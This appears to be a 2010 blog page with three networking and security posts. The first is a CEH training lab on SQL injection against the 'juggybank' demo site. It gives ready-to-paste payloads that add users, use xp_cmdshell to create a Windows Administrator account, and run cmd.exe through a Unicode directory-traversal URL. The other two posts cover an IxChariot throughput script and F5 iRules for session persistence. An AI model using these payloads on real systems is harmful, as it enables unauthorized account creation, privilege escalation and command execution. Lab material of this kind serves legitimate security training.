Friday, March 19, 2010

JuggyBank SQL Injection Mini Lab Demo

This Lab depends on the "juggybank" website that comes with the CEH courseware with SQL server installed on the target machine. These are simple examples of SQL injection attacks, but if they work, almost any SQL statement will also. If the database is something other than SQL Server than only the syntax of the SQL statements will change, but the basis for the attack is actually in the weak asp scripts used for the juggybank login

Hack Script
Point your browser to the juggybank site. Enter a single tick into the username field or address bar. If an page is returned that access is denied or CGI error" then you are in business.

Paste this at username field. It will create new user 'furynax' with password 'loop' at the app level.
';insert into userinfo values('furynax','loop')--


Paste this at the address bar to create user furynax at OS level with normal user privilege
';exec master..xp_cmdshell 'net user /add furynax loop';--


Use this command at browser address bar to assign user furynax with Administrator privilege
';exec master..xp_cmdshell 'net localgroup Administrators /add furynax loop';--


Paste this command at address bar to Explore C: drive of the victim machine. Similarly, you can use mkdir or other native MS-DOS command.The only real limits are your skill and imagination using it
http://(victim ip)/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\


Posted by furynax at 10:26 AM 0 comments
Labels: , , ,

IxChariot High Performance Throughput Script

IxChariot is a test tool for simulating applications and assessing network performance. This script emulates sending a file from Endpoint 1 to Endpoint 2, and getting a confirmation back. The default file size is 100,000 bytes.
Endpoint 1                                 Endpoint 2
----------                                 ----------
SLEEP                                       
initial_delay=0
CONNECT_INITIATE                           CONNECT_ACCEPT                              
source_port=AUTO                            destination_port=AUTO                     
0                                           0                                         
0                                           0                                         
LOOP                                       LOOP                                        
number_of_timing_records=100                number_of_timing_records=100              
START_TIMER                               
LOOP                                        LOOP                                      
transactions_per_record=1                   transactions_per_record=1               
SEND                                        RECEIVE                                 
file_size=10000000                           file_size=10000000                    
send_buffer_size=65535                       receive_buffer_size=65535             
send_datatype=NOCOMPRESS              
send_data_rate=UNLIMITED              
CONFIRM_REQUEST                             CONFIRM_ACKNOWLEDGE                     
INCREMENT_TRANSACTION                   
END_LOOP                                    END_LOOP                                  
END_TIMER                                 
SLEEP                                     
transaction_delay=0
END_LOOP                                   END_LOOP                                    
DISCONNECT                                 DISCONNECT                                  
close_type=Reset                           close_type=Reset
Posted by furynax at 9:19 AM 0 comments
Labels: , ,

JSessionID-Based Persistence

Universal Persistence
BIG-IP LTM software includes the Universal Inspection Engine (UIE). The UIE is a set of functions that allows you to direct and persist load-balanced traffic using iRules. Universal persistence uses the UIE which allows you to use persistence for sessions based on content data, or based on connections to a specific pool member, by defining a sequence of bytes in the connection to use as a session identifier.

iRule Example
The following iRule example illustrates how the LTM can find a cookie called FURYNAX in the first response from the server and add a persistence record for that cookie. Subsequent client requests containing the same cookie will persist to the same pool member.

when CLIENT_ACCEPTED {
set add_persist 1
}
when HTTP_RESPONSE {
if { [HTTP::cookie exists "FURYNAX"] and $add_persist } {
persist add uie [HTTP::cookie "FURYNAX"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "FURYNAX"] } {
persist uie [HTTP::cookie "FURYNAX"]
} else {
set jsess [findstr [HTTP::uri] "FURYNAX" 13 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

Another iRules examples

when CLIENT_ACCEPTED {
set add_persist 1
}

when HTTP_RESPONSE {
if { [HTTP::cookie exists "CSPSESSIONID-SP-57772-UP-csp-sys-"] and $add_persist } {
persist add uie [HTTP::cookie "CSPSESSIONID-SP-57772-UP-csp-sys-"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "CSPSESSIONID-SP-57772-UP-csp-sys-"] } {
persist uie [HTTP::cookie "CSPSESSIONID-SP-57772-UP-csp-sys-"]
} else {
set jsess [findstr [HTTP::uri] "CSPSESSIONID-SP-57772-UP-csp-sys-" 34 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

when CLIENT_ACCEPTED {
set add_persist 1
}

when HTTP_RESPONSE {
if { [HTTP::cookie exists "JSESSIONID"] and $add_persist } {
persist add uie [HTTP::cookie "JSESSIONID"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "JSESSIONID"] } {
persist uie [HTTP::cookie "JSESSIONID"]
} else {
set jsess [findstr [HTTP::uri] "JSESSIONID" 11 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

Validate Persistence Records

[root@ltm1:Active] config # b persist show all
PERSISTENT CONNECTIONS --
Mode: universal Value: nVTLLvHDy9GQJQ4T29LPwsLqXXCB2pTGJ3KR49WhpvvBwZyPrxQT!-167612729!-671022569
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 231sec

Mode: source addr Value: 10.21.33.39
Virtual: 10.251.3.145:https Node: 10.251.44.5:any Age: 12sec

Mode: universal Value: Cn18LvHQR8dyZH1S1BmnSxVGcDMvHz12JlTFnJFryvKZpgrrTBdZ!-167612729!-671022569
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 288sec

Mode: universal Value: G4JbLvHXFg2LrXnz71hyJWBGLgT7fQXJbw4G5nhvFThh2pDfymLY!-671022569!-167612729
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 188sec


Posted by furynax at 8:42 AM 0 comments
Labels: , , , ,
Subscribe to: Posts (Atom)